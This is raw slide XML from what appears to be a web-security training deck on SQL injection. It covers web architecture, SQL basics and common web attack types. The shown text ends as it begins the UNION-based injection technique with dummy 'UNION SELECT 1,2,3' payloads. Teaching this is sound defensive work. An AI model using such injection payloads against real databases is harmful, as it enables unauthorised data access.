      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Shape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672225" y="1849045"/>
            <a:ext cx="1587600" cy="116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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4521750" y="2662825"/>
            <a:ext cx="1688148" cy="1256040"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="51" name="Shape 51"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="50" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904350" y="3014545"/>
            <a:ext cx="3617400" cy="2763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2" name="Shape 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="874350" y="3506875"/>
            <a:ext cx="3687600" cy="1506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3" name="Shape 53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="50" idx="3"/>
            <a:endCxn id="46" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6209898" y="3290845"/>
            <a:ext cx="5727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54" name="Shape 54"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="49" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6139425" y="2431795"/>
            <a:ext cx="532800" cy="49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55" name="Shape 55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6029000" y="3918850"/>
            <a:ext cx="834000" cy="70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56" name="Shape 56"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="50" idx="2"/>
            <a:endCxn id="47" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5365824" y="3918865"/>
            <a:ext cx="513900" cy="67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SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(SQLi)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Formal Assessment </a:t>
            </a:r>
          </a:p>
        </p:txBody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414" name="Shape 4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1366"/>
            <a:ext cx="9144000" cy="4656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Application Architecture Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody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Here's the basic layout...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But tech kitty stoel my megahurtz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Now I need moar processors...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 421"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311400" y="1991650"/>
            <a:ext cx="2017258" cy="2164555"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInternalStorag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u="sng"/>
              <a:t>Presentation Tier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Internet Error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Firefox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Chrome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22" name="Shape 422"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351525" y="2683225"/>
            <a:ext cx="140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23" name="Shape 423"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769225" y="1980125"/>
            <a:ext cx="1913400" cy="237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u="sng"/>
              <a:t>Logic Tier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Apache, windows server, RAILS (Ruby), PHP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6985000" y="2083875"/>
            <a:ext cx="1775100" cy="23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u="sng"/>
              <a:t>Data Tier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SQL Server, Oracle, MySQL, Postgres, mongo db (yuck!)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7146375" y="2452700"/>
            <a:ext cx="703075" cy="484100"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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26" name="Shape 426"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5694075" y="2637125"/>
            <a:ext cx="127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7" name="Shape 427"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2351600" y="3651400"/>
            <a:ext cx="1406100" cy="5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8" name="Shape 428"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="424" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5751700" y="3270975"/>
            <a:ext cx="1233300" cy="19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29" name="Shape 429"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455250" y="2395075"/>
            <a:ext cx="11412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 http://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x="5809350" y="2337450"/>
            <a:ext cx="10374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SQL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" name="Shape 431"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547475" y="3363250"/>
            <a:ext cx="9450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 response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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5901550" y="3017475"/>
            <a:ext cx="7722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pic>
        <p:nvPicPr>
          <p:cNvPr id="433" name="Shape 4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0764" y="4458075"/>
            <a:ext cx="3103236" cy="2391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 Application Architecture Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody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440" name="Shape 440"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311400" y="1991650"/>
            <a:ext cx="2017258" cy="2164555"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInternalStorag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Tier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Internet Error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Firefox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Chrome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1" name="Shape 441"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351525" y="2683225"/>
            <a:ext cx="140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42" name="Shape 442"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769225" y="1980125"/>
            <a:ext cx="1913400" cy="237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Logic Tier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Apache, windows server, RAILS (Ruby), PHP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6985000" y="2083875"/>
            <a:ext cx="1775100" cy="23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Tier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SQL Server, Oracle, MySQL, Postgres, mongo db (yuck!)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7146375" y="2452700"/>
            <a:ext cx="703075" cy="484100"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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5" name="Shape 445"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5694075" y="2637125"/>
            <a:ext cx="127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46" name="Shape 446"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2351600" y="3651400"/>
            <a:ext cx="1406100" cy="5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47" name="Shape 447"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="443" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5751700" y="3270975"/>
            <a:ext cx="1233300" cy="19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48" name="Shape 448"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455250" y="2395075"/>
            <a:ext cx="11412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 http://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5809350" y="2337450"/>
            <a:ext cx="10374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SQL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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547475" y="3363250"/>
            <a:ext cx="9450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 response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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5901550" y="3017475"/>
            <a:ext cx="7722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291900" y="1657450"/>
            <a:ext cx="67188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GET http://www.OnlineStore.com/browse.php?category=processors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 Application Architecture Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody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459" name="Shape 459"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311400" y="1991650"/>
            <a:ext cx="2017258" cy="2164555"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInternalStorag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Tier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Internet Error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Firefox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Chrome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60" name="Shape 460"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351525" y="2683225"/>
            <a:ext cx="140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61" name="Shape 461"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769225" y="1980125"/>
            <a:ext cx="1913400" cy="237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Logic Tier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Apache, windows server, RAILS (Ruby), PHP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6985000" y="2083875"/>
            <a:ext cx="1775100" cy="23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Tier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SQL Server, Oracle, MySQL, Postgres, mongo db (yuck!)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7146375" y="2452700"/>
            <a:ext cx="703075" cy="484100"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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64" name="Shape 464"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5694075" y="2637125"/>
            <a:ext cx="127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65" name="Shape 465"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2351600" y="3651400"/>
            <a:ext cx="1406100" cy="5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66" name="Shape 466"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="462" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5751700" y="3270975"/>
            <a:ext cx="1233300" cy="19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67" name="Shape 467"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455250" y="2395075"/>
            <a:ext cx="11412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 http://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5809350" y="2337450"/>
            <a:ext cx="10374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SQL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" name="Shape 469"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547475" y="3363250"/>
            <a:ext cx="9450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 response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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5901550" y="3017475"/>
            <a:ext cx="7722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5763250" y="1542150"/>
            <a:ext cx="32733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SELECT * FROM products </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE category='processors'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3792275" y="4319925"/>
            <a:ext cx="17865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 Application Architecture Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody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479" name="Shape 479"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311400" y="1991650"/>
            <a:ext cx="2017258" cy="2164555"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInternalStorag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Tier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Internet Error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Firefox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Chrome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80" name="Shape 480"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351525" y="2683225"/>
            <a:ext cx="140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81" name="Shape 481"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769225" y="1980125"/>
            <a:ext cx="1913400" cy="237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Logic Tier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Apache, windows server, RAILS (Ruby), PHP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" name="Shape 482"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6985000" y="2083875"/>
            <a:ext cx="1775100" cy="23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Tier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SQL Server, Oracle, MySQL, Postgres, mongo db (yuck!)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7146375" y="2452700"/>
            <a:ext cx="703075" cy="484100"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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84" name="Shape 484"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5682550" y="2740850"/>
            <a:ext cx="1285200" cy="19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85" name="Shape 485"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2351600" y="3651400"/>
            <a:ext cx="1406100" cy="5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86" name="Shape 486"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="482" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5751700" y="3270975"/>
            <a:ext cx="1233300" cy="19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87" name="Shape 487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455250" y="2395075"/>
            <a:ext cx="11412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 http://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5809350" y="2337450"/>
            <a:ext cx="10374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SQL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" name="Shape 489"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547475" y="3363250"/>
            <a:ext cx="9450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 response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" name="Shape 490"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5901550" y="3017475"/>
            <a:ext cx="7722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491" name="Shape 491"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3965175" y="4515875"/>
            <a:ext cx="18558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i7, i5, i4, amd, ARM etc....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 Application Architecture Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody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498" name="Shape 498"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311400" y="1991650"/>
            <a:ext cx="2017258" cy="2164555"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInternalStorag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Tier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Internet Error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Firefox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Chrome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99" name="Shape 499"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351525" y="2683225"/>
            <a:ext cx="140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00" name="Shape 500"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769225" y="1980125"/>
            <a:ext cx="1913400" cy="237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Logic Tier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Apache, windows server, RAILS (Ruby), PHP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" name="Shape 501"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6985000" y="2083875"/>
            <a:ext cx="1775100" cy="23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Tier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SQL Server, Oracle, MySQL, Postgres, mongo db (yuck!)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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7146375" y="2452700"/>
            <a:ext cx="703075" cy="484100"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk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3" name="Shape 503"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5682550" y="2740850"/>
            <a:ext cx="1285200" cy="19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04" name="Shape 504"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2351600" y="3651400"/>
            <a:ext cx="1406100" cy="5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05" name="Shape 505"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="501" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5751700" y="3270975"/>
            <a:ext cx="1233300" cy="19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06" name="Shape 506"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455250" y="2395075"/>
            <a:ext cx="11412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 http://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5809350" y="2337450"/>
            <a:ext cx="10374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SQL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" name="Shape 508"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547475" y="3363250"/>
            <a:ext cx="9450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 response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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5901550" y="3017475"/>
            <a:ext cx="7722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pic>
        <p:nvPicPr>
          <p:cNvPr id="510" name="Shape 5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88" y="4190519"/>
            <a:ext cx="4194893" cy="2652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 basics</a:t>
            </a:r>
          </a:p>
        </p:txBody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Database servers (i.e. mysqld) host many databases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each database has a number of tables with data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Databases have users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some are admins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information is stored inside the database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Database users have permissions on what they can and cannot do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i.e. access only to database X,Y,Z but not A,B,C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file system access (more later)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Alter / Insert / Update / DELETE / Select permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ANY or specified databases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SQL Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody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retrieve information using the SELECT statement;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update information using the UPDATE statement;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add new information using the INSERT statement;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delete information using the DELETE statement.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 u="sng"/>
              <a:t>The characters</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>comment out anything that follows them in a SQL statement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SQL Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody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Information stored in SQL databases are organized in tables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each row stores a "record"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Username, First, LastName, Address, etc..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each column defines the datatype for each piece of data in each record.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varchar[8] Username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varchar[80] FirstName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text Address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int UserID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SQL Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody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Results retrieved from queries are also in the form of tables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SELECT A, B from table1;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535" name="Shape 535"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="256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{927AFFBE-70E4-4FC7-8A94-46933CCBDF17}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data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data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data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36" name="Shape 536"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="467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{927AFFBE-70E4-4FC7-8A94-46933CCBDF17}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441025"/>
                <a:gridCol w="1441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20075"/>
            <a:ext cx="2679700" cy="17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 Architecture Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6782625" y="3067175"/>
            <a:ext cx="1477200" cy="1437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64" name="Shape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2870089" y="3358538"/>
            <a:ext cx="2139000" cy="9153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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Shape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131350" y="4590425"/>
            <a:ext cx="1497000" cy="116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Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Shape 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772725" y="4590425"/>
            <a:ext cx="1497000" cy="116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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672225" y="1849045"/>
            <a:ext cx="1587600" cy="116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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4521750" y="2662825"/>
            <a:ext cx="1688148" cy="1256040"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator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 Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69" name="Shape 69"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="68" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904350" y="3014545"/>
            <a:ext cx="3617400" cy="2763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0" name="Shape 70"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="874350" y="3506875"/>
            <a:ext cx="3687600" cy="1506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1" name="Shape 71"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="68" idx="3"/>
            <a:endCxn id="63" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6209898" y="3290845"/>
            <a:ext cx="5727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72" name="Shape 72"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="67" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6139425" y="2431795"/>
            <a:ext cx="532800" cy="49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73" name="Shape 73"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6029000" y="3918850"/>
            <a:ext cx="834000" cy="70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74" name="Shape 74"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="68" idx="2"/>
            <a:endCxn id="65" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5365824" y="3918865"/>
            <a:ext cx="513900" cy="67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75" name="Shape 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513286" y="1557500"/>
            <a:ext cx="2100114" cy="1205820"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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Click jacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208486" y="3691100"/>
            <a:ext cx="1656072" cy="1205820"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Shape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122886" y="4072100"/>
            <a:ext cx="1656072" cy="1205820"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2613400" y="1883845"/>
            <a:ext cx="1332000" cy="10959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Packet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Sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Shape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206200" y="3251480"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Parameter 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Tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Shape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797000" y="3784880"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Forged Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5711400" y="3708680"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Direct Object Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Shape 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787600" y="2946680"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Shape 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492200" y="2260880"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Directory Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016200" y="1422680"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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XML Injection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SQL Basics - UNION</a:t>
            </a:r>
          </a:p>
        </p:txBody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SELECT X,Y,Z from table1 UNION SELECT A,B,C from table2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Will concatenate two (or more) SELECT result tables together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DISTINCT results only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"UNION ALL" to get duplicate values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Each SELECT statement must have the SAME number of columns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Columns must also have similar data types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Usually columns also have to be in the same order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SQL Basics - UNION</a:t>
            </a:r>
          </a:p>
        </p:txBody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In SQLi UNION SELECT statements commonly use dummy data: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 sz="3000"/>
              <a:t>SELECT .... from table1 UNION SELECT 1,2,3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 sz="3000"/>
              <a:t>Don't know what the original SQL select statement is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 sz="3000"/>
              <a:t>iterate by UNION SELECT 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
